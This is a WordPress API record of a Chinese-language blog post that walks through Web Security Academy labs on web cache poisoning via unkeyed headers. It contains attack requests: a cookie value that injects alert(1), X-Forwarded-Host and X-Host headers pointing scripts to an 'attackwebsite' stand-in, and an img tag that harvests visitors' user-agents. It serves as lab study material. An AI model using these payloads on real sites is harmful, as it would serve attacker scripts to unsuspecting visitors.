{"id":1129,"date":"2023-02-05T22:45:00","date_gmt":"2023-02-05T14:45:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1129"},"modified":"2024-04-14T11:28:26","modified_gmt":"2024-04-14T03:28:26","slug":"web-cache-poisioning-header","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1129","title":{"rendered":"web cache poisoning header"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>\u95dc\u65bc\u5feb\u53d6\u6295\u6bd2\u7684\u4ecb\u7d39\u53ef\u53c3\u8003<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"ee1cgZM9Tw\"><a href=\"https:\/\/systw.net\/note\/archives\/1127\">web cache poisioning<\/a><\/blockquote><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"web cache poisioning &#8212; \u725b\u7684\u5927\u8166\" src=\"https:\/\/systw.net\/note\/archives\/1127\/embed#?secret=X7ShJJDBjb#?secret=ee1cgZM9Tw\" data-secret=\"ee1cgZM9Tw\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f\uff0c\u5e38\u898b\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5c0dcookie\u6295\u6bd2<\/li>\n\n\n\n<li>\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/li>\n\n\n\n<li>\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/li>\n<\/ul>\n\n\n\n<p>\u6e2c\u8a66\u6642\u5efa\u8b70\u5728URL\u52a0\u4e0acache buster\uff08\u4f8b\u5982?cb=123\uff09\uff0c\u8b93\u88ab\u6c61\u67d3\u7684\u56de\u61c9\u53ea\u9032\u5165\u81ea\u5df1\u7684\u5feb\u53d6\u9805\u76ee\uff0c\u907f\u514d\u5f71\u97ff\u771f\u5be6\u8a2a\u5ba2\uff1b\u78ba\u8a8dheader\u70baunkeyed\u5f8c\u518d\u79fb\u9664cache buster\u505a\u6700\u7d42\u6295\u6bd2\u3002<\/p>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 
class=\"wp-block-heading\">\u5c0dcookie\u6295\u6bd2<\/h2>\n\n\n\n<p>\u76ee\u6a19\u4f7f\u7528cookie\u4e2d\u7684language\u4f86\u8abf\u6574\u7db2\u7ad9\u7684\u8a9e\u8a00\uff0c\u800c\u4e14\u6e2c\u8a66\u5f8c\u767c\u73fecookie\u662f<code>unkeyed header<\/code><\/p>\n\n\n\n<p>\u91dd\u5c0dcookie\u6e2c\u8a66\u5f8c\u767c\u73fefehost\u5167\u5bb9\u6703\u5f71\u97ff\u8fd4\u56de\u7d50\u679c\uff0c\u8acb\u6c42cookie\u5167\u7684fehost=prod-cache-01\uff0c\u6703\u5728\u8fd4\u56de\u7d50\u679c\u51fa\u73fe<code>\"frontend\":\"prod-cache-01\"<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## normal request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=prod-cache-01\n\n######## normal response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n        &lt;script&gt;\n            data = {\n                \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n                \"path\":\"\/\",\n                \"frontend\":\"prod-cache-01\"\n            }\n        &lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u53ea\u8981\u5c0dcookie\u5167\u7684fehost\u505a\u6c61\u67d3\uff0c\u5c31\u53ef\u4ee5\u5be6\u73fe\u5feb\u53d6\u4e2d\u6bd2\u653b\u64ca\u3002\u56e0\u70bafehost\u7684\u503c\u88ab\u76f4\u63a5\u5beb\u9032&lt;script&gt;\u5167\u7684JS\u5b57\u4e32\uff0c\u7528<code>\"<\/code>\u8df3\u51fa\u5b57\u4e32\u5373\u53ef\u57f7\u884calert(1)\u3002\u6ce8\u610f\u4e0b\u65b9\u653b\u64ca\u56de\u61c9\u7684X-Cache: miss\u3001Age: 0\u4ee3\u8868\u9019\u6b21\u8acb\u6c42\u662f\u628a\u6c61\u67d3\u5167\u5bb9\u5beb\u5165\u5feb\u53d6\uff1b\u61c9\u518d\u767c\u4e00\u6b21\u4e0d\u5e36\u60e1\u610fcookie\u7684\u8acb\u6c42\uff0c\u78ba\u8a8dX-Cache: hit\u5f8c\u624d\u4ee3\u8868\u6295\u6bd2\u6210\u529f\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## attack request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=someString\"-alert(1)-\"someString\n\n######## attack response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n        &lt;script&gt;\n            data = {\n                \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n                \"path\":\"\/\",\n                \"frontend\":\"someString\"-alert(1)-\"someString\"\n            }\n        
&lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p>\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6\u76f8\u540curl\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p>lab: Web cache poisoning with an unkeyed cookie<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/h2>\n\n\n\n<p>\u6709\u6642\u5019\u662f\u75312\u500b\u96b1\u85cf\u53c3\u6578\u624d\u6703\u7522\u751f\u8fd4\u56de\u5167\u5bb9\u7684\u8b8a\u5316<\/p>\n\n\n\n<p>\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee5\u4e0b2\u500b\u70ba\u96b1\u85cf\u53c3\u6578\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>X-Forwarded-Host\uff1a\u642d\u914dX-Forwarded-Scheme\u6642\uff0c\u9019\u500b\u503c\u4ee3\u8868\u65b0\u7db2\u5740<\/li>\n\n\n\n<li>X-Forwarded-Scheme\uff1a\u7576\u503c\u70bahttp:\/\/\u6703\u89f8\u767c302<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>\u53ea\u900f\u904eX-Forwarded-Host: example.net\uff0c\u770b\u4e0d\u51fa\u6709\u4ec0\u9ebc\u6548\u679c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: example.net\n\n########## response ###########\nHTTP\/1.1 504 Gateway Timeout<\/code><\/pre>\n\n\n\n<p>\u53ea\u900f\u904eX-Forwarded-Scheme: http:\/\/\uff0c\u53ef\u770b\u5230\u6703\u51fa\u73fe302\uff0c\u5982\u679c\u63db\u6210https:\/\/\u5247\u4e0d\u6703\u6709\u8b8a\u5316<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response 
###########\nHTTP\/1.1 302 Found\nLocation: https:\/\/ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\/resources\/js\/tracking.js\n...omit...<\/code><\/pre>\n\n\n\n<p>\u4f46\u5982\u679c\u5408\u4f75\u4e0a\u8ff02\u500b\u96b1\u85cf\u53c3\u6578\uff0c\u5c31\u80fd\u69cb\u9020\u8f49\u5740\u7684\u8acb\u6c42<\/p>\n\n\n\n<p>\u53ea\u8981\u628a\u4e3b\u6a5f\u63db\u6210\u653b\u64ca\u8005\u4e3b\u6a5f\uff0c\u4e26\u5728\u653b\u64ca\u8005\u4e3b\u6a5f\u7684resources\/js\/tracking.js\u6e96\u5099\u60e1\u610f\u4ee3\u78bc\uff0c\u5c31\u53ef\u4ee5\u5c0d\u5feb\u53d6\u6295\u6bd2\uff0c\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: attackwebsite\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response ###########\nHTTP\/1.1 302 Found\nLocation: attackwebsite\/resources\/js\/tracking.js\nConnection: close\nCache-Control: max-age=30\nAge: 7\nX-Cache: hit<\/code><\/pre>\n\n\n\n<p>\u6295\u6bd2\u5f8c\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6resources\/js\/tracking.js\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u653b\u64ca\u8005\u63d0\u4f9b\u7684resources\/js\/tracking.js<\/p>\n\n\n\n<p>lab: Web cache poisoning with multiple headers<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee51\u500b\u96b1\u85cf\u53c3\u6578\u70baX-Host\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code>\uff0c\u56e0\u6b64\u5c0d\u8a72\u53c3\u6578\u9032\u884c\u6295\u6bd2\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: 
ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\n...omit...\n\n########## response ###########\n...omit...\nVary: user-agent\n...omit...\n&lt;script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"&gt;&lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p>\u4e0d\u904e\u9019\u88e1\u8981\u6ce8\u610f\u7684\u5730\u65b9\u662f\u8fd4\u56de\u5167\u5bb9\u6709vary: user-agent\uff0c\u9019\u4ee3\u8868user-agent\u662f<code>key header<\/code>\u3002\u63db\u53e5\u8a71\u8aaa\uff0c\u8a2a\u5ba2\u9664\u4e86\u8981\u5b58\u53d6\u76f8\u540chost\u5916\uff0cuser-agent\u4e5f\u5fc5\u9808\u8981\u4e00\u6a23\uff0c\u624d\u80fd\u8a2a\u554f\u5230\u88ab\u6c61\u67d3\u7684\u5feb\u53d6\u5167\u5bb9<\/p>\n\n\n\n<p>\u5728\u9019\u500b\u76ee\u6a19\u7db2\u7ad9\u4e2d\uff0c\u7559\u8a00\u5340\u5141\u8a31html\uff0c\u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u9019\u500b\u65b9\u5f0f\uff0c\u53d6\u5f97\u6bcf\u500b\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;img src=\"https:\/\/attackwebsite\/foo\" \/&gt;<\/code><\/pre>\n\n\n\n<p>\u8a2a\u5ba2\u4e00\u4f46\u770b\u5230\u7559\u8a00\uff0c\u5c31\u6703\u89f8\u767c\u8a72html\uff0c\u53ea\u8981\u5230attackwebsite\u770b\u7db2\u9801\u65e5\u5fd7\u8a18\u9304\uff0c\u4fbf\u80fd\u770b\u5230\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>172.31.30.128   2023-09-18 08:40:09 +0000 \"GET \/foo HTTP\/1.1\" 404 \"User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\"<\/code><\/pre>\n\n\n\n<p>\u53d6\u5f97user-agent\u70ba<code>Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36<\/code>\u5f8c\uff0c\u5c31\u53ef\u4ee5\u91cd\u65b0\u69cb\u9020\u4e00\u500b\u6295\u6bd2\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: 
ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\nConnection: close\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\n...omit...\n\n########## response ###########\n...omit...\n&lt;script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"&gt;&lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p>\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u8a2a\u554f\u76f8\u540c\u7684host\uff0c\u4e26\u4f7f\u7528\u76f8\u540c\u7684user-agent\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p>Lab: Targeted web cache poisoning using an unknown header<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u95dc\u65bc\u5feb\u53d6\u6295\u6bd2\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 \u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f 
&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1129","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1129"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}